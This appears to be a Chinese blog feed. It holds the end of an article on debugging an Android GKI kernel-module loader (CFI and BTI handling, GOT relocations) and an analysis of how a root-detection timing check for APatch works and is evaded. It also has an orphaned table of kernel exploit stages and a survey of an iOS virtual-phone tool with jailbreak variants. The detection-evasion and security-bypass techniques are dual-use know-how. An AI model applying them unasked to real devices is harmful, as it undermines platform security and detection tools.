unsignedlong info_sec_offset = info->sechdrs[info->info_idx].sh_offset;
constchar *info_file_base =
    (constchar *)info->hdr + info_sec_offset;
mod->info.name =
    info->name - info_file_base + mod->info.base;
mod->info.version =
    info->version - info_file_base + mod->info.base;
mod->info.license =
    info->license - info_file_base + mod->info.base;

文件地址转换成运行时地址时，减法基准必须正确。如果指针指向 section 内部，就必须减去：

hdr + section_offset

而不是只减去：

hdr

CFI、BTI与异构代码边界

坑 29：CFI 保护代码调用非 CFI KPM 的边界问题

KPM 加载流程全部完成，section 搬迁和 relocation 都正确。但在调用：

kpm_init()

时设备静默重启。最后一条日志停在：

icache flushed, about to call KPM init

之后没有更多 dmesg。KPM Loader 自身是用 CFI_ICALL + LTO 编译的。这意味着 loader 中通过函数指针发起的间接调用，会被编译器插入 CFI 检查。而 KPM 二进制没有使用相同的 CFI 体系编译。于是当 loader 调用：

fn(args, event, reserved);

时，编译器会插入类型检查：

检查目标函数是否拥有匹配的 CFI 类型信息

但 KPM 的入口函数没有对应的 CFI 信息，于是触发 CFI failure。更复杂的是，CFI 问题并不只存在于：

loader → KPM

这一条路径。还会存在于：

KPM → KPM 内部函数指针
内核 → KPM 注册的回调
KPM thunk / trampoline → 非标准代码页

因此，单独处理某一个调用点是不够的。这类边界不能靠单点绕过，处理上需要覆盖两层。对 loader 主动调用 KPM 的入口函数，使用桥接函数并在桥接函数上关闭 CFI 检查：

__attribute__((no_sanitize("cfi")))
staticlongcall_kpm_init(kpm_initcall_t fn,
constchar *args,
constchar *event,
void *reserved){
return fn(args, event, reserved);
}
__attribute__((no_sanitize("cfi")))
staticlongcall_kpm_exit(kpm_exitcall_t fn, void *reserved)
{
return fn(reserved);
}

这解决的是：

loader → KPM

这一条直接调用路径。同时，对 KPM 代码区、hook 区、thunk 区、trampoline 区等额外分配的可执行代码页建立统一的区域追踪机制。

抽象逻辑如下：

staticboolis_kpm_exec_area(unsignedlong addr)
{
return is_kpm_area(addr)
        || is_hook_area(addr)
        || is_thunk_area(addr)
        || is_trampoline_area(addr);
}

最终判断原则是：

所有非内核原生构建体系生成的可执行代码页，都必须被 loader 明确登记和识别。

这样才能避免某些间接调用路径仍然落回内核 CFI 的默认失败路径。CFI 不是只在“调用入口函数”时才会触发。只要存在函数指针、回调、trampoline、thunk，就可能进入 CFI 检查路径。因此 CFI 适配必须从“单点修复”升级为“可执行区域治理”。

坑 30：KPM 入口函数必须有 BTI 着陆指令

CFI 边界处理后，崩溃转移到：

kpm_init

函数入口。

pstore 日志显示：

Target Branch Exception

ARM64 BTI 要求间接跳转目标地址的第一条指令必须是合法的 BTI landing pad。KPM Loader 通过函数指针调用：

mod->init()

这是一个间接调用。因此 CPU 会检查 kpm_init 第一条指令是否为合法 BTI 指令。如果 KPM 是用普通汇编或未启用 BTI 的编译器选项生成的，那么函数入口没有：

bti c

就会触发 Target Branch Exception。如果 KPM 用汇编写，入口函数需要显式添加 BTI landing pad：

kpm_init:
    hint #34        // bti c
    stp x29, x30, [sp, #-16]!
    ...
kpm_exit:
    hint #34        // bti c
    stp x29, x30, [sp, #-16]!
    ...

如果 KPM 用 C 编写，则使用：

-mbranch-protection=standard

只要函数是通过函数指针、回调或 thunk 间接进入的，它就必须满足 BTI 要求。KPM 是否是“模块内部代码”并不重要。从 CPU 视角看，它只是一个间接跳转目标。

运行期资源管理

坑 31：vfree() 需要原始分配地址

释放thunk时调用：

vfree(kp_thunk_addrs[idx]);

触发内核警告：

Trying to vfree() bad address

thunk 分配时，实际流程类似：

mem = vmalloc(PAGE_SIZE)
thunk = mem + 8
kp_thunk_addrs[idx] = thunk

这里把 thunk 放在 mem + 8 处，是为了避开函数入口前读取 CFI hash 时可能踩到 guard page 的问题。但 vfree() 要求传入的是：

vmalloc 返回的原始地址

也就是mem，而不是mem + 8。因此直接释放 thunk 会被内核认为是非法地址。释放前恢复页起始地址：

void *page =
    (void *)((unsignedlong)kp_thunk_addrs[idx] & ~(PAGE_SIZE - 1));
vfree(page);

vfree() 必须接收 vmalloc 返回的原始指针。

任何偏移后的地址都不能直接传给 vfree()。

坑 32：只读内核数据区不能依赖 set_memory_rw()

对某些内核只读数据区执行写入时，触发：

Unable to handle kernel write to read-only memory

即使提前调用了：

set_memory_rw()

仍然无效。安卓GKI中，一些关键内核数据在初始化后会被标记为：

__ro_after_init

这类区域通常位于内核自身的 .data / .rodata 相关映射中。

set_memory_rw() 对 vmalloc/module_alloc 这类动态映射区域更有效，但对内核线性映射或初始化后只读区域不一定能生效。

错误流程是：

set_memory_rw(target)
  → 实际失败或不适用
直接写 target
  → 触发只读内存写入异常

对于这类地址，必须使用架构允许的内核 patching 机制，而不是直接写。

在 ARM64 上，常见思路是通过内核提供的指令/文本 patch 接口完成临时可写映射、写入和恢复。

核心原则是：

不要假设 set_memory_rw 可以修改所有内核地址。

set_memory_rw() 不是万能写权限开关。

对于 __ro_after_init 或内核自身只读映射，直接写入很容易触发 Oops。

坑 33：页边界函数入口读取 CFI hash 会踩 guard page

KPM 中某个函数地址恰好页对齐：

0x...000

在读取：

*(func - 4)

获取 CFI hash 时，触发：

do_translation_fault

vmalloc/module_alloc 区域前后可能存在 guard page。

当函数入口正好位于页起始位置时：

func = page_start
func - 4 = previous_page + PAGE_SIZE - 4

而前一个页面可能是未映射的 guard page。

于是读取 func - 4 会触发页错误。

读取函数入口前 4 字节之前，必须检查页内偏移：

if ((func_addr & (PAGE_SIZE - 1)) >= 4) {
    u32 cfi_hash = *(u32 *)(func_addr - 4);/*
     * 使用 cfi_hash
     */}

如果函数入口位于页起始位置，就不能直接读取 func - 4。

读取函数入口前的元数据时，必须考虑页边界。

尤其是 vmalloc/module_alloc 产生的区域，前后 guard page 会让 addr - 4 这种访问变得危险。

GOT、外部符号与地址层级

坑 34：GOT 双重解引用与函数指针变量的地址层级

加载复杂 KPM 时，loader 报错：

unsupported RELA type 312

后续补上 GOT relocation 支持后，又出现新的崩溃：

跳转到 0x7fd503233f
触发 do_translation_fault

进一步反汇编发现，KPM 调用外部函数时生成了类似模式：

adrp x8, :got:symbol
ldr  x8, [x8, #:lo12]
ldr  x8, [x8]
blr  x8

也就是说，它不是直接调用 GOT 槽中的地址，而是做了两次解引用。复杂 KPM 会产生 GOT 重定位。type 312 对应 GOT 相关 relocation，例如：

R_AARCH64_LD64_GOT_LO12_NC

如果 KPM 使用：

-fPIC
-mcmodel=large

编译，就很容易产生 GOT 访问。

因此 loader 必须支持 GOT relocation。对于某些编译模型，KPM 对外部符号的访问可能不是：

GOT 槽 = 函数地址
直接 blr 函数地址

而是：

GOT 槽 = 某个指针变量的地址
第一次 ldr：取出指针变量地址
第二次 ldr：读取指针变量的值
blr：调用最终函数

如果 loader 直接把函数地址填进 GOT 槽，那么第二次 ldr 就会把函数开头的机器码当成指针读取。

例如函数开头如果是 PAC 指令：

0xd503233f

那么读取出来的“地址”就可能变成类似：

0x7fd503233f

最终跳转到垃圾地址。

更隐蔽的一层是符号声明类型。KernelPatch 中有些外部符号被声明为函数指针变量：

externvoid(*printk)(constchar *fmt, ...);
externunsignedlong(*kallsyms_lookup_name)(constchar *name);

这和普通函数声明完全不同：

externvoidprintk(constchar *fmt, ...);

两者语义区别如下：

声明形式	编译器理解	KPM 需要的地址
`extern void printk(...)`	`printk` 是函数	函数地址
`extern void (*printk)(...)`	`printk` 是函数指针变量	函数指针变量自身的地址

如果声明是：

externvoid(*printk)(constchar *fmt, ...);

那么KPM会生成：

先找到 printk 变量地址
再读取变量中的函数地址
最后调用

因此 loader 不能把 printk 解析成函数地址，而应该提供一个“指针变量”：

staticvoid(*kp_printk_ptr)(constchar *fmt, ...);
kp_printk_ptr = printk;/*
 * 注意：这里传的是变量地址，而不是函数地址。
 */local_syms[PRINTK_IDX].addr = (unsignedlong)&kp_printk_ptr;

同理：

staticunsignedlong(*kp_kallsyms_lookup_name_ptr)(constchar *name);
kp_kallsyms_lookup_name_ptr = kp_kallsyms_lookup_name;
local_syms[KALLSYMS_IDX].addr =
    (unsignedlong)&kp_kallsyms_lookup_name_ptr;

因此 loader 需要区分三种地址层级：

情况	应填入的地址
普通函数符号	函数地址
函数指针变量符号	指针变量自身地址
GOT 双重解引用符号	包装槽地址

对于需要包装的外部函数，可以分配一层 wrapper slot：

u64 *slot = &wrap_pool[wrap_count++];
*slot = real_func_addr;/*
 * GOT 槽中放 slot 地址，而不是 real_func_addr。
 */got_entry = (u64)slot;

这样 KPM 的双重解引用链条就成立：

GOT entry
  → wrapper slot 地址
    → wrapper slot 中保存真实函数地址
      → BLR 真实函数

外部符号解析不能只问“这个符号的地址是多少”。

还必须问KPM编译器认为这个符号是什么？

它可能是：

一个普通函数
一个函数指针变量
一个数据对象
一个需要 GOT 包装的外部引用

声明类型不同，编译器生成的访问模式完全不同。

loader 必须提供匹配的地址层级。

符号表维护

坑 35：local_syms 表与初始化代码错位

KPM 入口函数中第一个：

printk("init args=%s\n", args);

就触发崩溃。

反汇编发现：

ldr x8, [x24]
blr x8

但 x24 并不是 printk 指针变量地址，而是另一个 local symbol 的地址，甚至可能是某个完全无关的 helper 函数。

local_syms[] 表声明和 local_syms_init() 初始化函数是两份平行维护的列表。

表声明类似：

index 21 = printk
index 22 = hook_unwrap_remove
index 23 = sp_el0_is_current
...

但初始化代码中却写成了：

local_syms[21].addr = (unsignedlong)&kp_sp_el0_is_current;
local_syms[22].addr = (unsignedlong)&kp_thread_info_in_task;
local_syms[23].addr = (unsignedlong)&kp_sp_el0_is_thread_info;

从某个索引开始，表项和初始化代码整体错位。

结果就是：

KPM 想解析 printk
实际拿到 sp_el0_is_current

后续再叠加“函数指针变量地址层级”的问题，就会表现成非常混乱的跳转崩溃。

至少要保证表声明和初始化顺序完全一致：

local_syms[21].addr = (unsignedlong)&kp_printk_ptr;
local_syms[22].addr = (unsignedlong)&kp_hook_unwrap_remove;
local_syms[23].addr = (unsignedlong)&kp_sp_el0_is_current;
local_syms[24].addr = (unsignedlong)&kp_thread_info_in_task;
local_syms[25].addr = (unsignedlong)&kp_sp_el0_is_thread_info;
local_syms[26].addr = (unsignedlong)&kp_thread_size;
local_syms[27].addr = (unsignedlong)&kp_task_in_thread_info_offset;

更好的方式是使用 X-Macro 或集中式表定义，避免声明和初始化分离。

例如：

#define LOCAL_SYM_TABLE(X)                 \
    X(printk,                &kp_printk_ptr) \
    X(hook_unwrap_remove,    kp_hook_unwrap_remove) \
    X(sp_el0_is_current,     kp_sp_el0_is_current) \
    X(thread_info_in_task,   kp_thread_info_in_task)

然后用同一张表同时生成：

符号名数组
地址初始化代码
调试输出
索引枚举

平行维护的列表是 bug 温床。

只要中间插入或删除一次元素，就可能造成后续所有索引整体错位。

符号表这种核心数据结构，必须尽量做到单一事实来源。

6 全文总结

这条链路从用户态编译产物开始，先解决.o与.ko的ELF边界，再进入安卓GKI设备上的安全机制适配，最后落到KPM Loader在内核空间自行解析、重定位和执行KPM二进制。表面看是“把文件加载起来”，实际每一步都在补齐原本由Kbuild、链接器、内核模块加载器和架构代码共同承担的工作。

离线转换阶段的核心问题是格式正确性。.so是ET_DYN，.ko是ET_REL，二者不是删几个section就能互换。真正可行的路线是从ET_REL输入出发，保留必要段，重建符号表和重定位表，补齐.modinfo、.gnu.linkonce.this_module以及ARM64所需的.plt、.init.plt、.text.ftrace_trampoline。其中最关键的数据通道，是.rela.gnu.linkonce.this_module把init_module和cleanup_module写入struct module中的函数指针位置。

安卓GKI适配阶段的核心问题是执行环境正确性。SELinux可能让insmod在文件访问阶段就失败，vermagic后缀必须与目标设备匹配，BTI、PAC、SCS和CFI则要求模块代码必须符合目标内核的控制流和返回地址保护约束。即便内核本身能接受非标准section，厂商驱动也可能依赖传统.text布局，因此CFI_ICALL生成的.text.*子段还需要通过linker script合并回标准布局。

运行时Loader阶段的核心问题是把内核模块加载器的关键能力重新实现一遍。KASLR要求所有kallsyms地址只在单次启动周期内有效；module_alloc()返回的内存要先写入、重定位，再切换到可执行并刷新icache；GKI不保证导出loader需要的关键符号，只能通过已知入口间接解析；AArch64重定位常量、非ALLOC段sh_addr、section内指针转换、GOT双重解引用和local_syms表索引，都必须逐项处理。

最终收敛下来的经验很直接：不能猜目标内核参数，不能假设用户态ELF语义能套进内核，不能把地址层级和section基准混在一起，不能在ARM64上忽略RW与RX的阶段边界，也不能把CFI、BTI、PAC当成编译选项层面的附属问题。KPM Loader要稳定运行，必须同时尊重ELF格式、安卓GKI安全机制、AArch64指令语义和loader自身的数据结构一致性。

整篇文章看似是在讲把.so变成.ko，但真正贯穿其中的主题其实是：

当你试图绕开成熟的内核构建与加载体系时，原本被工具链、内核 loader、链接器和架构代码替你处理掉的细节，会一个不漏地回到你面前。

ELF格式只是第一层。真正困难的是：

架构安全特性
内核符号可见性
relocation 语义
内存权限模型
CFI / BTI / PAC 边界
厂商驱动假设
编译器生成代码模式
loader 自身的数据结构一致性

内核开发的残酷在于，它很少给你清晰的错误提示。

很多时候，一个relocation常量写错、一个地址多解引用一次、一个函数入口少了 bti c，最终表现出来的都只是：

静默重启
Instruction Abort
Translation Fault
Kernel panic

但也正因如此，每一次踩坑都格外有价值。希望这篇实战记录能帮助同样在 ARM64 安卓GKI设备上做内核开发、调试和研究的人，少走一些弯路。

以上就是全文内容。本文编写完成与工具开发完成时，作者还没有关注到KernelPatch项目，很多内容是自己实现。截止当前，有一个Android-kernel-inline-hook-framework项目，它封装了KernelPatch实现了APatch很多相关的功能，算是与本文的功能重合地方，只是没有实现KPM加载的功能。但可以关注学习一波！https://github.com/ChwnWang0/Android-kernel-inline-hook-framework

最后，感谢本文作者的分享，也期待他的重构版本工具发布！

跳转微信打开

APatch最新版检测与过检测原理分析

Wed, 06 May 2026 10:32:00 +0800

原创非虫 2026-05-06 10:32 湖北

APatch最新版检测与过检测原理分析

本文主要讲解Duck-Detector最新版本引入的对APatch的检测原理的分析，以及APatch官方的过检测思路。
作者：非虫（fei_cong@hotmail.com）

Duck-Detector的检测逻辑

APatch目前只支持ARM64架构，那检测与反检测都是针对安卓这一架构进行。这个检测思路的关键点不在于检测框架调用了什么系统功能或有什么文件特征，而是“同一个系统调用在两种输入下的时间差有多大”。

核心检测逻辑大致如下：

1. 读取两组输入，一组是128字节的key字符串，一组是仅包含`\0`的key字符串。
2. 用ARMv8硬件计时器测两组输入的平均延迟。
3. 计算两者差值。
4. 如果差值超过3.0微秒，就同时标记`kernel_su`和`apatch`。

官方补丁的过检测思路

需要说明的是，先有APatch的内核补丁工具仓库KernelPatch的补丁提交，才有检测器的检测点更新。这也与很多的漏洞分析一样，攻击者往往在目标程序更新漏洞后，通过分析补丁内容还原Poc。KernelPatch的思路是改写路径顺序：尽量让不可信调用在进入敏感逻辑之前就结束，避免每次都先把用户态缓冲区拷进来，再去做认证判断。

从公开diff能直接确认的变化，主要集中在predata.c、sucompat.c、supercall.c和头文件声明上。大致逻辑概括如下：

1. 先判断当前UID是不是排除对象，避免无关路径继续执行。
2. 如果`has_preset_superkey()`分支成立，就再去读取用户缓冲区并做认证。
3. 把trusted caller和authed拆成两个状态。
4. 不是trusted caller就提前返回，不进入后续拷贝和命令处理。
5. 只有通过前置判定后，才跳过原始处理器并进入supercall。

对应的过检测代码如下：

inthas_preset_superkey()
{
return start_preset.superkey[0] == '\0';
}staticvoidhandle_before_execve(char **__user u_filename_p, char **__user uargv, void *udata)
{
// 先排除不需要进入处理链的UID
uid_t uid = current_uid();
if (!is_su_allow_uid(uid)) return;
char __user *ufilename = *u_filename_p;
char filename[SU_PATH_MAX_LEN];
// 先把用户态路径拷进内核缓冲区，再继续后续逻辑
int flen = compat_strncpy_from_user(filename, ufilename, sizeof(filename));
if (flen < 0) return;
}staticvoidbefore(hook_fargs6_t *args, void *udata)
{
// 先看当前UID是不是排除对象
uid_t uid = current_uid();
if (get_ap_mod_exclude(uid)) return;
// 把“是否可信”和“是否已认证”拆成两个状态
int is_trusted_caller = 0;
int is_authed = 0;
// 如果存在预置superkey，先从用户态拷贝key，再做认证
if (has_preset_superkey()) {
constchar *__user key_user = (constchar *__user)syscall_argn(args, 0);
char key[MAX_KEY_LEN];
long len = compat_strncpy_from_user(key, key_user, MAX_KEY_LEN);
if (len <= 0) return;
        is_authed = !auth_superkey(key);
        is_trusted_caller = is_authed;
    }
// 管理员UID直接进入可信路径
if (is_trusted_manager_uid(uid)) {
        is_trusted_caller = 1;
        is_authed = 1;
    } elseif (is_su_allow_uid(uid)) {
        is_trusted_caller = 1;
    }
// 非可信调用直接结束，不进入后续拷贝和命令处理
if (!is_trusted_caller) return;
long ver_xx_cmd = (long)syscall_argn(args, 1);
long cmd = ver_xx_cmd & 0xFFFF;
if (cmd < SUPERCALL_HELLO || cmd > SUPERCALL_MAX) return;
// 读取后续参数，交给补丁后的supercall统一处理
long a1 = (long)syscall_argn(args, 2);
long a2 = (long)syscall_argn(args, 3);
long a3 = (long)syscall_argn(args, 4);
long a4 = (long)syscall_argn(args, 5);
// 跳过原始实现，避免再次走旧的认证分支
    args->skip_origin = 1;
    args->ret = supercall(is_authed, cmd, a1, a2, a3, a4);
}staticlongsupercall(int is_authed, long cmd, long arg1, long arg2, long arg3, long arg4)
{
// 未通过认证时，直接拒绝敏感命令
if (!is_authed) return -EPERM;
switch (cmd) {
// 这里省略其它命令分支
default:
break;
    }
    ...
return -ENOSYS;
}

这里的“认证前拷贝”，对应的是compat_strncpy_from_user(key, key_user, MAX_KEY_LEN)这一段。它先把用户态传入的key复制到内核缓冲区，再交给auth_superkey(key)判断是否通过认证。也就是说，认证判断本身并不是直接读取用户态指针，而是建立在一次内核态拷贝之后完成的。

真正的认证路径则体现在supercall(is_authed, cmd, a1, a2, a3, a4)这一步。前置钩子先把is_trusted_caller和is_authed分开处理，只有可信调用才会继续往下走；而在supercall内部，if (!is_authed) return -EPERM;又把后续敏感命令重新卡住。于是，认证前拷贝负责把输入带进来，认证路径负责决定这些输入能不能进入真正的命令分支。

这段改动的意义在于，把“是否可信”和“是否已认证”拆成两个状态。

is_trusted_caller决定这次调用能不能继续往下走，is_authed决定后面的supercall里哪些命令可以真正执行。这样一来，很多不该进入copy_from_user的场景，会在更早的分支里结束掉。

supercall本体也从is_key_auth改成了is_authed。表面上只是变量名变化，实质上是把认证状态的语义整理得更清楚，让前置钩子和实际命令执行之间的关系更直接。

另一个补丁点在sucompat.c。这里先判断is_su_allow_uid(uid)，再去做compat_strncpy_from_user。这一步很小，但很关键，因为它减少了不可信应用触发用户态拷贝的机会。对于Duck-Detector这种专门盯时间差的工具来说，只要路径里多了一次不必要的拷贝，就可能把侧信道放大。

predata.c里新增的has_preset_superkey()，以及predata.h和userd.h里的接口补位，说明这次修补不是单点热修，而是在把启动预置状态、认证状态和UID信任判断拆开整理。提交说明里提到的“mark as umount直接跳过所有supercall”，从思路上看也是同一类动作：把本来可能暴露时间差的路径尽量前移或直接裁掉。

过检测效果分析

这个补丁的效果，可以直接从提交里的基准数据看出来。

补丁前，128字节key字符串的平均延迟是4.281微秒，'\0'key字符串是0.460微秒，差值大约3.821微秒，远高于Duck-Detector的3.0微秒阈值。补丁后，两者分别变成0.943微秒和0.607微秒，差值缩小到0.336微秒，已经和普通未打补丁系统的0.792微秒对0.446微秒非常接近。

这说明补丁把时间差压回了正常系统“认为”的自然抖动范围。对于这类检测器来说，真正重要的不是绝对值，而是异常差值是否足够大到越过阈值。KernelPatch这次做对的事情，就是让这个差值不再像补丁前那样显著。

但这不等于检测逻辑失效。它只是说明这条侧信道当前被压住了。只要未来检测器改用更高分辨率的计时方式，或者把多个信号叠加起来，仍然可能重新把差异拉出来。

结论

这次对抗的本质很清楚：Duck-Detector在KernelPatch官方最新提交的过检测补丁的启发下，找到了一种通过侧信道稳定检测老版本APatch的方法。显然，这个检测只对当前设备是2026年五一之前APatch框架的版本有效，升级到最新版本后可以无视这个检测。

阅读原文

跳转微信打开

阶段	目的
阶段 1	重置 AEAD 状态机，使其处于待处理状态 (Operation Type 3)
阶段 2	注入虚假状态，接管内核栈中的偏移量 (Operation Type 2)
阶段 3	锁定篡改路径，触发 Page Cache 覆写 (Operation Type 4)

电子书更新分享：Linux内核模块编程指南.pdf

Mon, 27 Apr 2026 09:00:00 +0800

原创非虫 2026-04-27 09:00 湖北

Linux内核模块编程指南中文PDF

这最近2个多月的几十次更新变化挺大的，Linux内核模块编程指南全书的目录有了很大的变化，更新一个全新的版本给大家，方便朋友们学习内核模块开发。

点击阅读原文，跳转PDF下载

阅读原文

跳转微信打开

iOS虚拟手机实现能力现状

Sun, 26 Apr 2026 19:16:00 +0800

原创非虫 2026-04-26 19:16 湖北

iOS虚拟手机实现能力现状

上一篇《iOS虚拟手机实现原理解析》写作时，vphone-cli还处在很早期的形态，

iOS虚拟手机实现能力现状

上一篇《iOS虚拟手机实现原理解析》写作时，vphone-cli还处在很早期的形态，仓库大约只有5个commit。那时它更像一个把Apple私有Virtualization.framework能力拉起来的启动工具：用少量Swift/ObjC代码创建PV=3虚拟机，再配合Python脚本和Shell脚本完成固件合并、引导链补丁、DFU恢复、Ramdisk启动和CFW安装。

截至2026-04-26分析时，vphone-cli已经不只是“能启动虚拟iPhone”的PoC，而是逐渐演化成了一套围绕iOS虚拟手机构建、修补、安装、运行、自动化、越狱和环境切换的研究平台。

本文不再重复上一篇中已经讲过的PV=3硬件模型、私有Entitlements、DFU恢复、SHSH签名、Ramdisk引导和基础CFW安装细节，而是从当前仓库的提交演进和文件结构出发，梳理vphone-cli现在具备了哪些能力，以及这些能力相比早期版本解决了什么问题。

1 分析基线

分析的仓库为：

https://github.com/Lakr233/vphone-cli

项目当前最关键的变化可以概括为五点。

第一，固件补丁逻辑从早期Python脚本为主，迁移到SwiftFirmwarePatcher模块为主。Python现在主要保留在CFW二进制修补、pymobiledevice3桥接、Ramdisk构建等脚本侧。

第二，工具入口从分散脚本变成Makefile统一入口。构建、签名、VM创建、固件准备、固件补丁、DFU恢复、Ramdisk、CFW、越狱安装、Host预检、AMFI绕过辅助和备份切换都集中在make目标中。

第三，固件变体从单一路线扩展为Patchless、Regular、Development和Jailbreak四种路径。不同路径对应不同的安全绕过强度、调试能力和越狱能力。

第四，虚拟机运行时不再只是显示图形界面和串口，而是通过vphoned和主机侧控制Socket提供文件、应用、钥匙串、剪贴板、IPA/TIPA安装、位置、电池、低电量、触控、按键、截图和自动化测试能力。

第五，研究环境从一次性制作转向可复用生命周期管理。VM配置进入config.plist清单，ECID和UDID可以稳定预测，VM状态可以备份、恢复和切换。

2 项目变化

项目初始提交发生在2026-02-27，主题是“Add vphone CLI, ObjC wrappers, and scripts”。这个提交一次性加入23个文件，大约4933行内容。这个阶段的核心目标很明确：把PCC固件里的vphone能力搬到本地macOS上，让虚拟iPhone可以进入DFU、恢复固件、启动系统，并通过SSH/VNC访问。它更像上一篇文章分析的形态，技术重点集中在“如何跑起来”。

从2026-03-01到2026-03-08，提交密度明显上升。2026-03-04单日就有43次commit，是整个仓库演进中最密集的一天。这一阶段集中出现了JB安装流程、TXM补丁重构、Kernel JB补丁验证、GDB调试Stub、Ramdisk测试流程、vphoned雏形、录屏截图、文件传输、位置模拟、窗口状态、JB首启收尾等能力。也就是说，项目已经从“启动链补丁工具”转向“可交互研究环境”。

从2026-03-10到2026-03-12，仓库进入结构化重构阶段。d042596提交完成Swift固件补丁器与CLI接线，6d11093加入VM manifest系统，e189b80加入vphoned模块化、菜单整合和SwiftUI应用浏览器。这个阶段的意义在于，早期散落在Python脚本和临时验证脚本中的固件补丁逻辑，开始沉淀为可测试、可复用、可由CLI直接调用的Swift模块。

从2026-03-14到2026-03-20，仓库开始补齐工程化能力。新增VM备份、恢复和切换，新增aria2c下载支持，pymobiledevice3替代大部分外部libimobiledevice工具，--install-ipa支持自动安装，boot_host_preflight.sh开始承担Host环境诊断职责。这些提交解决的是“每次都手工搭环境、手工排错、手工切换”的痛点。

从2026-03-28到2026-04-22，项目的重点又转向自动化和Patchless变体。主机侧vm/vphone.sock自动化控制Socket被加入，随后每次动作返回压缩灰度截图，适合AI或E2E测试工具闭环控制。Patchless路线则尝试减少传统引导链和内核安全绕过，转向文件系统重建、BuildManifest哈希更新、AEA密钥处理、GPU驱动和Mobile Activation修补等路线。2026-04中旬以后，AMFI预检、非完全关闭SIP/AMFI环境支持、amfidont辅助脚本、Patchless binpack和--no-vphoned选项也陆续出现。

这些提交线索说明，vphone-cli的目标已经从“证明iOS虚拟手机可启动”升级为“让安全研究者能够重复创建、修补、运行、控制和维护多个虚拟iOS环境”。

3 项目仓库结构

当前仓库结构已经明显分层。

sources/vphone-cli负责Host侧主程序。它包含CLI参数解析、VM生命周期、PV=3硬件模型、Virtualization配置、窗口和菜单、虚拟机视图、触控注入、位置转发、电池同步、Touch ID转发、录屏截图、文件浏览、应用浏览、钥匙串浏览、IPA/TIPA安装和主机侧自动化Socket。

sources/FirmwarePatcher负责Swift固件补丁。它按AVPBooter、iBoot、TXM、Kernel、DeviceTree、Filesystem和Manifest拆分模块，并通过FirmwarePipeline按固件变体组织执行顺序。这里还引入了ARM64编码/反汇编、IM4P处理、Mach-O辅助、PatchRecord输出和测试目标。

scripts/vphoned是Guest侧守护进程。它运行在iOS虚拟机内部，通过vsock端口1337和Host侧通信。它承担HID、文件、钥匙串、应用、剪贴板、URL、设置、位置、低电量、IPA安装等能力，并在非Patchless路径下支持自更新。

scripts/patchers现在主要保留CFW阶段的动态二进制修补逻辑，例如seputil、launchd_cache_loader、mobileactivationd和launchd的jetsam补丁。

research目录则记录补丁矩阵、TXM分析、Kernel JB补丁验证、DeviceTree、manifest来源、键盘事件链路、机器标识存储和迁移总结。它已经不只是说明文档，而是补丁可靠性和跨版本迁移的依据。

4 四种固件变体

当前项目把固件路线分为Patchless、Regular、Development和Jailbreak四种变体。它们不是简单的开关组合，而是四个不同目标的制作路径。

Patchless变体的目标是尽量减少传统意义上的引导链和内核安全绕过。它保留更多iOS安全机制，转而通过文件系统合并、trustcache生成、mtree生成、digest.db生成、SystemVolume root_hash生成、BuildManifest哈希更新和AEA重新加密来让系统接受修改后的文件系统。后续提交还加入了GPU驱动、Mobile Activation补丁、vphoned安装、binpack可选安装、--no-binpack和--no-vphoned开关。它适合研究“更接近原厂安全状态”的虚拟iOS环境，但并不等于完全无修改。

Regular变体是上一篇文章主线的延续。它会绕过AVPBooter、iBSS、iBEC、LLB、TXM和Kernel中的关键签名、SSV、APFS、AMFI、launch constraints、dyld策略和Sandbox路径，再通过CFW安装Cryptex、GPU驱动、iosbinpack64、launchd缓存加载器补丁、mobileactivationd补丁和LaunchDaemons。它的价值是稳定得到一个可SSH、可VNC、可运行基础工具的虚拟iPhone。

Development变体在Regular基础上增强调试能力。它使用TXMDevPatcher，加入get-task-allow、debugger entitlement、Developer Mode bypass等补丁，并在CFW阶段加入dev overlay、rpcserver_ios替换和debugserver权限修补。2026-04-20还加入了thread_guard_violation相关内核补丁，用于禁用EXC_GUARD交付，使行为更接近生产环境中不崩溃的路径。这个变体更适合动态调试、RPC控制和调试器接入。

Jailbreak变体是安全绕过最强的路径。根据research/0_binary_patch_comparison.md，它在基础补丁之外包含TXM Dev/JB补丁、iBSS nonce跳过、Kernel JB扩展、Procursus bootstrap、BaseBin hooks、TweakLoader、Sileo、TrollStore Lite和首启LaunchDaemon收尾。研究文档中的细粒度统计显示，Regular总计51项，Development总计65项，Jailbreak总计127项。这里的总数包含启动链补丁、CFW二进制补丁和安装组件，粒度比README首页的用户摘要更细。

从能力定位看，四种变体可以这样理解：

Patchless
用于尽量保留安全机制的文件系统重建路线。
Regular
用于稳定启动和基础远程访问。
Development
用于调试器、RPC和开发态实验。
Jailbreak
用于完整越狱环境、包管理器、插件加载和更深系统访问。

5 Swift固件补丁

早期仓库使用Scripts/patch_firmware.py处理固件补丁。当前仓库已经把这条主线迁移到SwiftFirmwarePatcher模块。Package.swift中可以看到独立的FirmwarePatchertarget，它依赖Capstone、Img4tool和MachOKit，并被vphone-cli可执行程序引用。

当前CLI支持两个直接面向固件补丁的子命令：

vphone-cli patch-firmware --vm-directory <dir> --variant regular
vphone-cli patch-component --component kernel-base --input  --output

FirmwarePipeline按以下顺序组织组件：

AVPBooter
iBSS
iBEC
LLB
TXM
kernelcache
DeviceTree
Filesystem
Manifest

不同变体会在这些组件上选择不同的patcher。Regular使用基础iBoot、TXM和Kernel补丁。Development把TXM切换为TXMDevPatcher，Kernel使用dev模式。Jailbreak会在基础Kernel补丁后追加KernelJBPatcher，并在iBSS阶段追加JB扩展。Patchless则跳过大部分传统引导链和内核补丁，把重点放到Filesystem和Manifest。

这次迁移的价值不只是“用Swift重写”。它改变了补丁工程的组织方式：

IM4P容器加载和保存由IM4PHandler统一处理。
PatchRecord可以输出为JSON，便于比较和回归。
DeviceTree、Filesystem和Manifest作为管线阶段参与，而不是散落在临时脚本中。
make fw_patch
、make fw_patch_dev和make fw_patch_jb都通过Swift管线执行，减少Python脚本与Swift启动器之间的语义漂移。
测试目标tests/FirmwarePatcherTests用于维持补丁行为的一致性。

上一篇文章中大量描述了AVPBooter、iBoot、TXM和Kernel的补丁原理。当前仓库真正新增的能力，是把这些补丁从“可执行脚本”提升为“项目内部可维护的固件补丁系统”。

6 自动化安装与运行

早期制作拉起虚拟iPhone需要人工串起多个步骤：安装依赖、构建工具、创建VM、下载两份固件、合并固件、补丁、启动DFU、获取SHSH、恢复、构建Ramdisk、发送Ramdisk、进入SSH、安装CFW、首次启动。当前Makefile已经把这些步骤统一成可组合目标。

一键流程入口是：

make setup_machine

它背后的scripts/setup_machine.sh会按顺序完成以下工作：

执行Host依赖安装、项目构建和签名。
创建VM目录并生成config.plist。
执行fw_prepare下载或复制iPhone IPSW和cloudOS IPSW。
